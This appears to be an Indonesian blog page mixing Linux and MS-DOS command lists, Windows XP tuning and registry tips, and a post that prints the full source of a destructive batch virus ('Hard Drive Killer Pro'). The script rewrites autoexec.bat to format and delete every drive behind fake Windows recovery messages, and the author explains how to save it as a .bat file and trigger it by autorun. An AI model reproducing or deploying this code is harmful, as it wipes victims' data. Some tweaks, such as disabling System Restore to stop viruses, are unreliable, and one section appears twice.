Perintah-Perintah Linux

Bagi kita masyarakat awam yang baru saja mengenali LINUX akan kesulitan pada saat melakukan kompilasi atau mengintegrasikan suatu perintah ke dalam suatu mesin. Tidak semua aplikasi di linux dapat dijalankan di GUI (General User Inreface). Untuk itu dibutuhkan yang namanya perintah di konsol berikut perintah-perintah tersebut :


dmseg = untuk melihat apa saja yang ada di komputer kita
ifconfig = untuk melihat IP pada komputer kita
reboot = Restart Komputer
halt = Shutdown
logout = Log off
ls = Menampilkan isi direktori
ps aux = Melihat apa saja program yang berjalan (windows task manager)
useradd agung = Menambah user dengan nama user agung
passwd agung = Memberikan password pada user agung
userdel agung = menghapus nama user agung
rm-rf/home/agung = Menghapus nama user agung secara permanen
usermod = Merubah data login
chfn = Merubah informasi user
—–> exp : usermod -l tamu -g umum guest –> user guest ke tamu ke group umum
groupadd = Menambah group
groupdel = Menghapus group
groupmod = Modifikasi group
who = Mengetahui siapa saja user yang sedang login
users = Mengetahui nama user yang sedang login di system
Mesg (Y/N) = Memberi pesan
Write = Pesan bersifat individual
wall = Pesan yang bersifat masal
mkdir = Membuat direktori/folder
cd = Pindah ke direktori
rmdir = Menghapus direktori
cp = Mengcopy file
r rw- r– = Membaca hak akses
chmod = Merubah hak akses
chown = Merubah kepemilikan
mv = Memindahkan file
mount = dimuat
unmount = dikembalikan
——> exp : #mount /dev/fd0, /mnt/floppy
#unmount/mnt/floppy
fdformat = format floppy disk/mkfs
——> exp : #fdformat/dev/fd0 bila sudah
#mkfs -t msdos -n agung /dev/fd0
tar = Menggabungkan beberapa file
——> exp : gzip(gz) ><><>< vi =" Teks" 9 =" Menghentikan" df =" Informasi" link =" koneksi" wget =" seperti" f7 =" Pindah" mcfv =" backup" mxpfv =" Restore" su =" Subtituse"> Mengganti user
yast = Kontrol panel seperti di windows (di suse)
Command = Description
pwd = Melihat direktori kerja saat ini
hostname = Menampilkan nama local host (mesin dimana anda sedang bekerja).
Gunakan perintah ” netconf” (sebagai root) untuk merubah nama
host dari mesin tersebut, atau edit file /etc/hosts
whoami = Mencetak login name anda
id username = Mencetak user id (uid) atau group id (gid)
date = Mencetak atau merubah tanggal dan waktu pada komputer, contoh
merubah tanggal dan waktu ke 2000-12-31 23:57 dengan perintah :
date 123123572000
time = Melihat jumlah waktu yg ditangani untuk penyelesaian suatu proses
+ info lainnya. Jangan bingung dengan perintah “date”
who = Melihat user yang login pada komputer kita.
rwho -a = Melihat semua user yg login pada network anda. Layanan perintah
rwho ini harus diaktifkan, jalankan setup sebagai root untuk
mengaktifkannya.
finger user_name = Melihat informasi user, coba jalankan : finger root
last = Melihat user sebelumnya yang telah login di komputer.
uptime = Melihat jumlah waktu pemakaian komputer oleh seseorang, terhitung
proses reboot terakhir.
ps = (=print status) Melihat proses-proses yang dijalankan oleh user
ps axu | more = Melihat seluruh proses yang dijalankan, walaupun tanpa terminal control, juga ditampilkan nama dari user untuk setiap proses.
top = Melihat proses yang berjalan, dengan urutan penggunaan cpu.
uname -a = Informasi system kernel anda
free = Informasi memory (dalam kilobytes).
df -h = (=disk free) Melihat informasi pemakaian disk pada seluruh system
(in human-readable form)
du / -bh | more = (=disk usage) Melihat secara detil pemakaian disk untuk setiap
direktori, dimulai dari root (in human legible form).
cat /proc/cpuinfo = Cpu info. Melihat file pada /proc directori yang bukan merupakan
file nyata (not real files).
cat /proc/interrupts = Melihat alamat interrupt yang dipakai.
cat /proc/version = Versi dari Linux dan informasi lainnya.
cat /proc/filesystems = Melihat filesystem yang digunakan.
cat /etc/printcap = Melihat printer yang telah disetup
lsmod = (as root) Melihat module-module kernel yang telah di load.
set|more = Melihat environment dari user yang aktif
echo $PATH = Melihat isi dari variabel “PATH”. Perintah ini dapat digunakan
untuk menampilkan variabel environmen lain dengan baik. Gunakan
“set” untuk melihat environmen secara penuh.
dmesg = Mencetak pesan-pesan pada waktu proses boot. (Menampilkan file:
/var/log/dmesg.)
ps = (=print status) Menampilkan proses yang sedang berjalan
berdasarkan nomor PID. Gunakan “ps AXU” untuk melihat seluruh
proses yang berjalan. Dan gunakan “top” untuk melihat prosese yang
berjalan berdasarkan urutan pemakaian CPU.
fg PID = Menyetop proses ke foreground
bg PID = Mengirim proses ke background. Lawan dari “fg”, atau gunakan tombol
z.
kill PID = Membunuh proses, berdasarkan nomor PID yang didapat dari perintah “ps”
killall program_name = Membunuh program berdasarkan nama program
xkill = (dalam xwindow terminal) Membunuh program dalam GUI-based dengan mouse
(letakkan pointer mouse anda pada windows yg akan dikill lalu click)
lpc = (sebagai root) untuk mengecek dan mengontrol printer
lpq = Menampilkan antrian print yang akan dilaksanakan.Under KDE
(X-Windows), anda bisa juga menggunakan program GUI-based “Printer
Queue” yang tersedia di “K”menu-Utilities.
lprm job# = Menghapus job print antrian (queue)
nice program_name = Menjalankan program berdasarkan prioritas. Dimulai sejak prioritas
tidak dijalankan secara spesifi, dalam contoh ini, prioritas akan
dilakukane bekisar 10 (proses akan berjalan lebih lambat), dari
nilai default (umumnya 0). Nilai terkecil (dari “niceness” ke user
lain pada sistem), merupakan priority tertinggi. Nilai prioritas
dapat berkisar antara -20 sampai 19. Hanya root yang bisa memasukkan
nilai negatif. Gunakan “top” untuk menampilkan nilai prioritas
proses yang sedang berjalan.
renice -1 PID = (sebagai root) Ubahlah prioritas yang sedang berjalan ke -1. Normal
users hanya dapat merubah nilai proses mereka sendiri, dan mereka
tidak dapat menaikkan nilai prioritas lebih tinggi dari yang telah ada
(atau mereka dapat membuat proses berjalan lebih lambat)

= Pindah ke text terminal pertama. Di Linux anda dapat membuka beberapa
terminal pada waktu bersamaan
= (n=1..6) Pindah ke n text terminal.
= Pindah ke GUI pertama (jika hanya 1 windows yg aktif).
= (n=7..12) Pindah ke n GUI terminal Jika GUI terminal aktif pada layar n-1)
= Autocomplete perintah (pada terminal). SHORTCUT INI SANGAT BAGUS! Bekerja
juga di LILO prompt!
= Scroll & edit perintah-perintah sebelumnya, lalu tekan [Enter] untuk
menjalankan perintahnya.
= Menggulung 1 layar ke atas pesan sebelumnya. Dengan perintah ini anda
dapat juga untuk melihat booup message
= Kebalikan dari di atas
<+> = (pada X-window) Merubah resolusi berikutnya pada X-server (jika anda
mensetup lebih dari 1 resolusi pada file XF86Config)
<-> = (pada X-window) Merubah ke resolusi sebelumnya pada X-server.
= (pada X-windows) Menutup X-window server. Gunakan jika X-windows server
anda crash dan tidak dapat exit secara normal.
= Mengshutdown sistem komputer kemudian melakukan reboot. Ini adalah
perintah normal untuk shutdown oleh user pada mode text.
c = Membunuh proses yang sedang aktif
d = Keluar dari terminal, sama dengan perintah “exit” atau “logout”
d = Mengirim [End-of-File] ke proses yang sedang berjalan
s = Menyetop proses transfer ke terminal
q = Melanjutkan proses transfer ke terminal. Gunakan jika terminal anda tidak
ada respon
z = Mengirim proses ke background.
reset = Merestore terminal yang menampilkan karakter lucu / aneh yang biasanya
disebab anda memakai perintah “cat” untuk melihat binari file. Anda tidak
akan melihat huruf yang anda ketik.
= Mempaste text yang di blok. Ini adalah perintah normal untuk
copy-paste pada Linux (Sangat bagus bila digunakan mouse dengan 3
tombol, apabila anda memiliki mouse lama dengan 2 tombol, anda harus
mengaktifkan emulate 3 button.
~ = (tanda tilde) pada My home directori. Contoh, cd ~/my_dir akan merubah
dari direktori aktif ke subdirektori “my_dir” pada home direktori.
. = (dot atau titik) digunakan untuk menjalankan program pada aktif direktori,
contoh, “./my_program” akan menjalankan file “my_program” pada direktori
aktif anda.

Buat Windows XP anda jadi kencang

Ruang-ruang yang akan kita sentuh adalah sebagai berikut :

1. System Properties
2. System Configuration
3. Registry

1. System Properties
Adalah ruang berisi informasi tentang nama dan organisasi pemilik. Anda bisa membukanya dengan klik kanan pada icon My Computer dan pilih Properties. Atau bisa juga dengan menekan tombol Start + Pause Break.

Ada beberapa rahasia yang akan kita obrak-abrik pada system properties ini, sehingga menghasilkan installasi yang optimal. Ikuti langkah berikut:

1. Klik kanan pada icon My Computer dan pilih Properties. Atau bisa juga dengan menekan tombol Start + Pause Break.
2. Klik menu System Restore, pastikan anda mengklik Turn Off System Restore On All Drives. Ini akan sangat berguna untuk menghalau salah satu cara perkembangbiakan virus.
3. Kemudian klik Advanced. Terdapat 3 menu setting di bawahnya.
1. Klik Setting pertama dan pastikan anda memilih Adjust For Best Performance. Ini akan mengubah tampilan windows anda menjadi klasik. tetapi jika ingin tetap menggunakan tampilan XP, pilih saja (beri tanda cek) pada pilihan:
1. Use visual styles on windows and buttons.
2. Smooth edges of screen fonts.
3. Use drop shadows for icon labels on the desktop (jika icon desktop diaktifkan). Lanjutkan dengan mengklik Apply.
2. Selanjutnya klik Advanced, dan klik Change untuk merubah Virtual Memory. (Virtual memory adalah Space yang dijadikan memory bayangan untuk membantu kinerja memory asli yang biasa kita sebut RAM) Virtual memory ini akan meminta ruangan dari harddisk.
3. Pada sub menu Custome Size, terdapat kolom Initial Size. Isikan kolom dengan angka minimal 2 kali jumlah RAM yang anda pasang. Misalnya anda memasang RAM 128 MB, maka isi kolom tersebut dengan jumlah minimal 256. Dan pada kolom berikutnya isi dengan 2 x kolom pertama. Jangan lupa klik Set . Klik OK dan OK lagi sehingga kembali ke System Properties awal.
4. Sekarang, klik menu Setting yang ketiga, anda akan melihat dua kolom yang berisi angka 30. Rubah angka tersebut menjadi 3. Kemudian buang tanda Ceklis (v) pada Automatically Restart.
5. Klik OK setelah selesai.
6. Tutup System Properties dengan mengklik OK.


2. System Configuration
Ruang berikutnya yang akan kita bedah adalah System Configuration . Perhatikan langkah berikut :

1. Klik Start pilih Run dan ketik msconfig kemudian Ok atau langsung tekan Enter.
2. Dideretan menu bagian atas, di ujung kanan terdapat menu Startup. Klik menu tersebut.
3. Lihat ke bagian bawah, terdapat sederetan nama dengan masing-masing mempunyai tanda ceklis (v).

Nama-nama tersebut adalah indikasi program yang akan selalu berjalan ketika Windows baru pertama kali tampil. Dan jika kita membiarkan tanda ceklisnya, maka Windows akan sedikit lambat ketika pertama kali proses Loading .

1. Buang tanda ceklis pada nama program yang dianggap tidak perlu untuk ditampilkan pada waktu START UP. Kemudian klik Apply
2. Klik OK untuk menutup System Configuration dan klik Restart.

Setelah komputer Restart dan kembali ke ruangan Desktop , anda dikagetkan dengan munculnya kotak dialog yang tentu saja berbahasa inggris. Langsung saja klik kotak kecil untuk memberi ceklis pada Don't Show This Massage kemudian klik OK. Maka kotak tadi tidak akan muncul lagi ketika Windows baru Restart .


3. Registry
Registry adalah ruang Administrator Windows. Keluar masuknya program yang terinstall akan selalu melapor terlebih dahulu ke Registry.

Berikut ini adalah directory yang terdapat di Registry yang akan kita obrak-abrik:

1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG


Yang akan kita sentuh adalah bagian 1 dan 2. Ikuti langkah berikut:

1. Klik Start pilih Run dan ketik regedit, klik OK atau langsung tekan Enter.
2. Klik tanda plus (+) pada HKEY_CURRENT_USER
3. Klik tanda plus (+) pada Control Panel
4. Klik tanda plus (+) pada Desktop

Perhatikan jendela sebelah kanan pada posisi Desktop. Terdapat sederetan String yang cukup memusingkan dan tentu saja berbahasa Inggris. Cari dan temukan MenuShowDelay. Jika sudah ketemu, klik dua kali dan rubah nilainya dari 400 menjadi 0, kemudian klik OK.

* Sekarang kembali ke jendela sebelah kiri
* Dibawah directory Desktop terdapat sub directory WindowsMetrics. Klik sub directory tersebut dan perhatikan jendela sebelah kanan.
* Cari dan temukan MinAnimate, klik dua kali pada value tersebut dan rubah nilainya menjadi 1, klik OK.

Sekarang tutup Registry dengan tombol Alt + F4 atau dengan mengklik tanda silang X dibagian atas kanan jendela. Restart Komputer anda dan lihat hasilnya.

Basic MS-DOS Commands

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders

virus pembunuh


mungkin anda sudah tidak kaget dengan source virus yang satu ini,salah satu virus yang sangat membahayakan bagi komputer anda.
source virus ini biasa digunakan atau dipasang oleh pihak2 yang kejam,pernah saya utarakan virus ini pernah dipasang di suatu cd bajakan dan diberi autorun,jadi ketika kita memasukan cd tersebut kedalam komputer/laptop anda otomatis virus ini berjalan jika autorun anda tidak dinonaktifkan.dan hanya selang beberapa detik saja smua data hardiskmu akan lenyap seperti hardisk kosong yang baru anda beli.jika file ini dipasang para pembuat virus yg kejam wah..berbahaya juga yah,sedangkan kita hanya terkena virus2 perusak dan pengopy data kita ajah dah kesusahan..yah begitulah kita harus jeli sendiri dalam melihat data dari luar.
oke ini suatu contoh aja bukan bermaksud menyebarkan atau yg lain.
setidaknya bisa menjadi pengetahuan bagi anda,tentunya yang belum tau aja bagi yang sudah master g usah dibaca dech.
file ini saorce mentah yang bisa anda simpan dinotepad .txt
jika mungkin anda ingin mencobanya dikomputer anda sendiri mungkin notepad itu bisa anda rubah menjadi file .bat.
contoh virus.bat <--cara berjalanya hanya anda klik aja file bat itu 2x atau juga bisa dibuat file autorun :).saya sarankan jangan mencoba2 untuk bermain2 dengan virus 1 ini,kasian ama yg banyak data2 pentingnya.bisa nangis2 dech kehilangan data2 dalam beberapa detik.oke salam damai ya hehehe... <-------------------------->
code:

@echo off
rem This program is dedecated to a very special person that does not want to be named.

:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don’t worry about how it
rem works, it’s damn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.

echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find “Vol” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it’s true.
rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find “bytes” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive – not ready.
rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:.\/ad/w/-p $b find ” 0 bytes free” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it’s errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it’s not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. “enddc” stands for “end dDRIVE cHECKING”.

rem Now we will use the program drivechk.bat to attain valid drive information.

:testdrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul
if %drive%.==. set drive=c
del drivechk.bat >nul

:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga’s Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don’t worry. Think about it.>>c:\autoexec.bat

echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat

:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in (“if not exist %%2\nul md %%2″ “if exist %%2\nul cd %%2″) do %%%%a >>c:\temp.bat
echo for %%%%a in (“>ass_hole.txt”) do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul

cls
echo Initializing Variables . . .
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls
echo Thank you for using a Munga Bunga product.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What’s the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo Don’t you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga

:end

pengetahuan itu penting dan pengalaman itu lebih penting karena dimana kita pernah memiliki suatu hal yang membuat kita bisa tertawa ataupun membuat kita menangis :-)

Menonaktifkan Task Manager


Task Manager merupakan sebuah fitur standar yang sudah terintregasi
dalam berbagai versi windows yang berbasis NT,seperti Windows NT,2000,xp dan vista.
Fungsinya adalah untuk menginformasikan proses dan aplikasi yang sedang bekerja,
mengubah prioritas,menampilkan informasi performa pc,dan masih banyak lagi

dengan menonaktifkan task manager,saat user menekan Ctrl+Alt+Del,fitur tersebut tidak akan dapat diakses.
dan hanya akan peringatan "Task Manager has been disabled by your Administrator".
demikian pulsa jika pengguna mengklik kanan mouse ditaskbar opsi Task Manager akan diredupkan
dan tidak dapat diklik.

langsung saja saya beri langkah2 untuk menonaktifkannya.


1.jalankan registry editor


2.masuklah ke dalam key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.


3.jika sub key Sytem belum ada,Anda dapat membuatnya dengan mengklik Edit>New>key kemudian beri nama System.


4.Buat DWORD value baru dengan mengklik kanan mouse pada bagian kanan jendela kemudian pilih New>DWORD value,dan beri nama DisableTaskMgr.


5.klik DisableTaskMgr tadi kemudian isikan value datanya dengan nilai 1.


6.tutup registry editor kemudian log off atau restart windows anda.

setelah anda hidupkan kembali fungsi task manager tersebut sudah nonaktif
selamat mencoba.

Menonaktifkan Task Manager


Task Manager merupakan sebuah fitur standar yang sudah terintregasi
dalam berbagai versi windows yang berbasis NT,seperti Windows NT,2000,xp dan vista.
Fungsinya adalah untuk menginformasikan proses dan aplikasi yang sedang bekerja,
mengubah prioritas,menampilkan informasi performa pc,dan masih banyak lagi

dengan menonaktifkan task manager,saat user menekan Ctrl+Alt+Del,fitur tersebut tidak akan dapat diakses.
dan hanya akan peringatan "Task Manager has been disabled by your Administrator".
demikian pulsa jika pengguna mengklik kanan mouse ditaskbar opsi Task Manager akan diredupkan
dan tidak dapat diklik.

langsung saja saya beri langkah2 untuk menonaktifkannya.


1.jalankan registry editor


2.masuklah ke dalam key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.


3.jika sub key Sytem belum ada,Anda dapat membuatnya dengan mengklik Edit>New>key kemudian beri nama System.


4.Buat DWORD value baru dengan mengklik kanan mouse pada bagian kanan jendela kemudian pilih New>DWORD value,dan beri nama DisableTaskMgr.


5.klik DisableTaskMgr tadi kemudian isikan value datanya dengan nilai 1.


6.tutup registry editor kemudian log off atau restart windows anda.

setelah anda hidupkan kembali fungsi task manager tersebut sudah nonaktif
selamat mencoba.

cara untuk melindungi registry


Registry merupakan jantung bagi windows.segala pengaturan sistem operasi windows tersimpan di sini.
bisa dibayangkan apa yang terjadi jika registry itu sampe diakses orang yang jail.
Mengingat betapa pentingnya registry,saya berbagi cara untuk mengunci registry anda dari tangan2 jail,
cara ini diperuntukan yang memakai OS windows xp sampe ke vista.

1.Jalankan regsitry editor melalui Start > Run dan ketik regedit lalu ok.
kemudian anda masuk ke dalam key HKEY_USERS\.DEFAULT\software\Micosoft\Windows\CurrentVersion\policies\system.


2.Buatlah sebuah data DWORD dengan nama
DisableRegistryTools dan isikan datanya dengan 0.


3.Lakukan back up registri pada key tersebut,yaitu dengan mengklik Regsitry > Export Registry File dan
berikan namanya ,misal Open.


4.Kemudian kembali ke data DWORD tersebut,
dan gantilah nilainya dengan 1.


5.ulangi langkah 3 dengan memberikan nama yang
berbeda,misalnya Close.


6.sekarang keluar dari registry editor dan cobalah menjalankan kembali.
windows akan mengeluarkan pesan yang menyatakan bahwa anda tidak dapat mengedit registry.

Dengan cara tadi,anda dapat membuka registry dengan menjalankan file yang bernama Open.reg
dan memproteksinya dengan mengeksekusi file Close.reg.
oke smoga ini bisa bermanfaat untuk yang membutuhkan.
and terima kasih banyak yang sudah nyempatin mbaca2 coretan2 ini :).

mematikan fungsi autorun


autorun ini sangat memudahkan pengguna untuk melihat data yang masuk entah dari cd drive atau dari usb flasdisk atauun hardisk external.
tapi disisi lain fitur ini justru menjadi perantara virus dalam mempermudah serangan.
berbagai virus menggunakan autorun sebagai jalan masuk kesistem windows tanpa kita tau dan kita sadari
entah itu dari media flasdisk cd yang masuk kewindows kita.

dengan menonaktifkan fitur autorun ini anda secara tidak sengaja juga akan mencegah komputer anda dari serangan virus dari media luar.
dan yg sering melihat file2 viruspun dapat mendelet dengan manual file tersebut sebelum menyebar.
saya sendiri pernah menemukan sebuah cd bajakan yang disitu terpasang virus yang efeknya memformat windows anda dalam beberapa detik
setelah anda restart komputer tak akan bisa menyala karena file2 exe diwindows terformat abis.
